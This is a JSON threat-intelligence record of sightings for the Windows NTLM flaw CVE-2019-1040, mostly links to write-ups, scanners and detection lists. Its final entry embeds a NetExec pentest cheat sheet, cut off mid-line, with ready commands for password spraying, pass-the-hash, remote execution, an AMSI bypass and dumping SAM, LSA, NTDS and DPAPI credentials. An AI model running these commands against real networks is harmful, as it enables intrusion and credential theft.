{"vulnerability": "CVE-2019-1040", "sightings": [{"uuid": "74a5b66c-4724-47cb-ae51-45330b47bbbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "MISP/5f850411-c103-491f-abff-9421425403cf", "content": "", "creation_timestamp": "2020-10-21T08:19:11.000000Z"}, {"uuid": "18f50f2a-b188-42d3-b4e4-bb42b1e88175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "MISP/42d04e94-bf5b-427d-acc8-f5d740675941", "content": "", "creation_timestamp": "2020-10-20T15:57:21.000000Z"}, {"uuid": "5e9aad42-8682-49ba-9164-9d994820e01e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "MISP/d925a2ee-e7cf-46f6-bec1-ad8e19122730", "content": "", "creation_timestamp": "2020-10-20T15:58:04.000000Z"}, {"uuid": "4b5fc099-b423-4ad8-97cf-60015135ec24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2019-1040", "type": "seen", "source": "https://gist.github.com/Darksidesfear/97c95439522b3c4dec1538398066aa8f", "content": "", "creation_timestamp": "2025-05-04T11:34:03.000000Z"}, {"uuid": "83cbb3c7-f24f-434b-8afb-850a5ca83439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/antichat/5409", "content": "Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-06-14T12:15:26.000000Z"}, {"uuid": "3bc3a082-297f-4893-bb7b-d6666b952593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "f8e31699-1acf-4b13-9399-8e00ad6e0a84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "Telegram/6ozsUPZBjsDLdZG63vMadgqko_WpCCgDVLV4ovLlz1dO__U", "content": "", "creation_timestamp": "2025-12-07T03:00:05.000000Z"}, {"uuid": "2b3b0f38-caa5-49db-8a95-121744fca736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/antichat/5859", "content": "https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-07-14T08:50:16.000000Z"}, {"uuid": "eaed2013-1e61-4bd1-8480-9daaacf6d250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/YouPentest/5564", "content": "\u041a\u0435\u0440\u0431\u0435\u0440\u043e\u0441. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 Windows \u0432 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0438 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435.\n\n00:00 \u041f\u043b\u0430\u043d \u0432\u0438\u0434\u0435\u043e\n00:20 \u041e\u0431 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 Kerberos\n01:55 TGT\n08:20 TGS\n14:19 Golden ticket, ntds.dit, krbtgt\n23:02 Silver ticket\n25:15 Kerberoasting\n32:45 AS-REQ Roasting\n36:30 AS-REP Roasting\n43:15 \u041f\u0440\u043e SPN\n47:27 Delegation\n49:20 Unconstrained delegation, printer bug \u0438 DCSync \n57:35 DCSync \u0438 Rubeus\n01:06:50 Unconstrained delegation Pro tip\n01:11:05 Constrained delegation\n01:14:01 S4U2Self \u0438 S4U2Proxy\n01:21:50 Protected users. Account is sensitive and cannot be delegated\n01:24:19 'Forwardable' ticket flag\n01:32:37 Resource-based constrained delegation\n01:47:20 NTLM relay attack. NTLMrelayx \u0438 Rubeus\n01:58:50 MS Exchange Pro tip\n02:03:19 CVE-2019-1040\n02:06:06 LDAP signing\n02:12:25 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u0435 Constrained delegation\n02:15:36 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u0435 NTLM relay attack, Resource-based constrained delegation \u0438 LDAP signing\n02:17:07 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u0435 SPN\n02:18:59 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u0435 NTLMrelayx \u0438 secondary DNS\n\nhttps://www.youtube.com/watch?v=qZPvgoUzCdI\n\n#video #infosec #cybersecurity #pentesting #kerberos #ad", "creation_timestamp": "2024-02-26T16:38:10.000000Z"}, {"uuid": "5dde8526-5897-4672-baa1-6c1eeda15108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://t.me/is_n3ws/36", "content": "\u0410\u041d\u0411 \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u043e \u0430\u0442\u0430\u043a\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0432\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u043e \u043e\u0442\u0447\u0435\u0442. Top-20 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\nhttps://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF\n\nGaining Remote Access: \n-----------------------------\nCVE-2019-11510: Arbitrary file read/Pulse Secure VPN\nCVE-2019-19781: RCE/Citrix ADC\nCVE-2020-8195/3/6: Unauthenticated access\nCVE-2019-0708: RCE on RDP server\nCVE-2020-5902: RCE in F5 BIG-IP\n\nAD:\n----\nCVE-2020-1472: #ZeroLogon\nCVE-2019-1040: NTLM relay bypass\n\nMDM: \n------\nCVE-2020-15505: MobileIron device management\n\nExploiting Public Facing Services:\n---------------- \nCVE-2020-1350: RCE/ DNS Servers #SigRed\nCVE-2018-6789: RCE/ Exim mail transfer\nCVE-2018-4939: RCE/ Adobe's Cold Fusion\n\nWorkstation Local Privilege Escalation:\n-------------------------\nCVE-2020-0601: ECC spoofing #CurveBall\nCVE-2019-0803: Win32k Elevation of Privilege\n\nInternal Applications:\n--------------------\nCVE-2020-0688: RCE/MS Exchange\nCVE-2020-2555: RCE/Oracle Weblogic\nCVE-2019-11580: RCE/Atlassian Crowd\nCVE-2019-18935: RCE/ASP.Net\nCVE-2015-4852: RCE/Apache\nCVE-2019-3396: Unauthorized Access/Confluence\nCVE-2020-10189: RCE/Desktop Central", "creation_timestamp": "2020-11-06T22:00:17.000000Z"}, {"uuid": "2aa6ac98-9fde-4c35-b078-a9dcfe08ba95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/mis_team/97", "content": "CVE-2019-1040\n\n\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u0432\u0441\u0435 \u043e\u0431\u0441\u0443\u0436\u0434\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2019-1040 \u0438 \u043f\u0430\u0442\u0447 \u043e\u0442 \u041c\u0430\u0439\u043a\u0440\u043e\u0441\u043e\u0444\u0442\u0430.\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u0435\u0449\u0451 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0437\u043d\u0430\u0435\u0442\u0435 - \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c.\n\u0424\u0438\u0448\u043a\u0430 \u0432 ntlm. \u041e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 ntlm \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438 - \u0435\u0441\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u0434\u0430\u0442\u044c SMB \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u043d\u0430 LDAP. \u0412 \u0438\u0442\u043e\u0433\u0435 RCE \u043f\u043e\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435.\n\n\u041a\u0430\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c: \u0432 ntlmrelayx \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0435\u0441\u043b\u0438 \u043e\u043d\u0430 \u043d\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u0430.\n\n\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u043a\u043e\u0432: \u043f\u0430\u0442\u0447 \u0435\u0441\u0442\u044c \u0438 \u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u0441\u0442\u0440\u0435\u0435.\n\n\u0414\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0430 \u0438 \u0440\u0435\u0434\u0442\u0438\u043c\u0430: \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0439\u0442\u0435 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439. \u0415\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 - \u0432\u044b \u043d\u0430\u0448\u043b\u0438 \u043b\u0451\u0433\u043a\u0438\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0437\u0430\u0432\u043b\u0430\u0434\u0435\u0442\u044c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439.\n\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-06-15T11:10:30.000000Z"}, {"uuid": "08b6ffef-18e6-4c7d-b947-3d6e50456f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/256", "content": "#tools\n#Blue_Team_Techniques\nCVE-2019-1040 Scanner\nhttps://github.com/fox-it/cve-2019-1040-scanner\n// Checks for CVE-2019-1040 vulnerability over SMB", "creation_timestamp": "2023-09-08T08:46:43.000000Z"}, {"uuid": "b2f11ce7-282a-4396-a814-113b99134767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "Telegram/0sD_EyHySREvSWLaWKL-XHqTqDduPkHhIy1vEKF4pCPQbv8", "content": "", "creation_timestamp": "2020-10-28T02:58:38.000000Z"}, {"uuid": "17ac5c03-df72-47fa-ac38-4debb71501fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "Telegram/VhpI9vwSnkp5aTH5NVtKHmjw7iSFjGG8mVB-6en3z_Pvdw", "content": "", "creation_timestamp": "2020-05-06T15:39:23.000000Z"}, {"uuid": "c28420a6-bc59-43ca-be5b-3090219cfe3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/canyoupwnme/5627", "content": "Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-06-14T09:16:51.000000Z"}, {"uuid": "2fff2381-9a71-4f6f-8330-d8b4d77efadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/797", "content": "#tools\n#Blue_Team_Techniques\nNTLM Scanner \u2060- tool to check servers/hosts for various known NTLM vulnerabilities over SMB: CVE-2019-1019, CVE-2019-1040, CVE-2019-1166, CVE-2019-1338...\nhttps://github.com/preempt/ntlm-scanner", "creation_timestamp": "2024-10-10T02:52:34.000000Z"}, {"uuid": "0f61b486-9ed8-4b99-9164-245dea0af5bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/283", "content": "#Research\n\"RAMBleed attack (CVE-2019-1040)\", 2019.\nhttps://www.documentcloud.org/documents/6150180-RamBleed-attack-CVE-2019-0174.html", "creation_timestamp": "2020-12-20T13:44:57.000000Z"}, {"uuid": "12094871-72d6-4b98-8244-bfddd372978b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/301", "content": "#Offensive_security\n1. Magento 2.3.1: \nUnauthenticated Stored XSS to RCE\nhttps://blog.ripstech.com/2019/magento-rce-via-xss\n2. Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin", "creation_timestamp": "2022-02-17T07:26:31.000000Z"}, {"uuid": "352f0041-f84e-4ab7-90eb-52d0133c8f08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://t.me/GithubRedTeam/85109", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a PrintSpoofer-ReflectiveDLL\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JonyFilc\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 1 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 3\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-20 22:59:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThe Windows Print Spooler privilege escalation vulnerability (CVE-2019-1040/CVE-2019-1019) has been implemented as a Reflective DLL for penetration testing.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T23:02:57.000000Z"}, {"uuid": "654967e3-b3f1-44dc-84b4-5ef2aee1f4ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/284", "content": "#Red_Team_Tactics\n1. Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://blog.preempt.com/drop-the-mic\n2. Coding a reliable CVE-2019-084 bypass\nhttps://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html", "creation_timestamp": "2023-10-26T20:37:33.000000Z"}, {"uuid": "0397a52b-1a52-42cd-a991-455073480e1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "exploited", "source": "https://t.me/suboxone_chatroom/132", "content": "Both Falcon identity protection modules provide Active Directory attack detections:\n\u2022 Account enumeration reconnaissance (BloodHound, Kerberoasting)\n\u2022 Bronze Bit (CVE-2020-17049)\n\u2022 Brute force attacks (LDAP simple bind, NTLM, Kerberos)\n\u2022 Credential scanning (on-premises)\n\u2022 Cloud-based (Azure AD) brute-force/credentials scanning\n\u2022 DCSync \u2014 Active Directory replication\n\u2022 DCShadow\n\u2022 Forged PAC for privilege escalation (Bulletin MS-14-068)\n\u2022 Golden Ticket\n\u2022 Hidden object detected\n\u2022 NTLM Relay Attack (including MS Exchange)\n\u2022 Overpass-the-Hash (Multiple methods - Mimikatz, CrackMapExec)\n\u2022 Pass-the-Hash (Impacket, CrackMapExec, Metasploit)\n\u2022 Pass-the-Ticket\n\u2022 Possible exploitation attempt (CredSSP) CVE-2018-0886\n\u2022 Remote execution attempts\n\u2022 Skeleton Key and Mimikatz Skeleton Key\n\u2022 Suspected NTLM authentication tampering (CVE-2019-1040)\n\u2022 ZeroLogin (CVE-2020-1472)", "creation_timestamp": "2024-12-27T11:55:02.000000Z"}, {"uuid": "f76f1f39-6330-41cf-8345-5bc0ec7ce807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc --help` and `nxc -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc -u -p / -H [flags] -M -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10 # Single host\nnxc smb 192.168.1.0/24 # CIDR range\nnxc smb 192.168.1.1-100 # Range\nnxc smb targets.txt # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' -d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10 # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5 # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24 # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt # Find relay targets\n```\n\n### Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\" # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content # Search file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3 # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\" # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\" # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32 # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump # Using regdump\n\n# LSA Secrets\nnxc smb 192.168.1.10 -u admin -p pass --lsa # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass 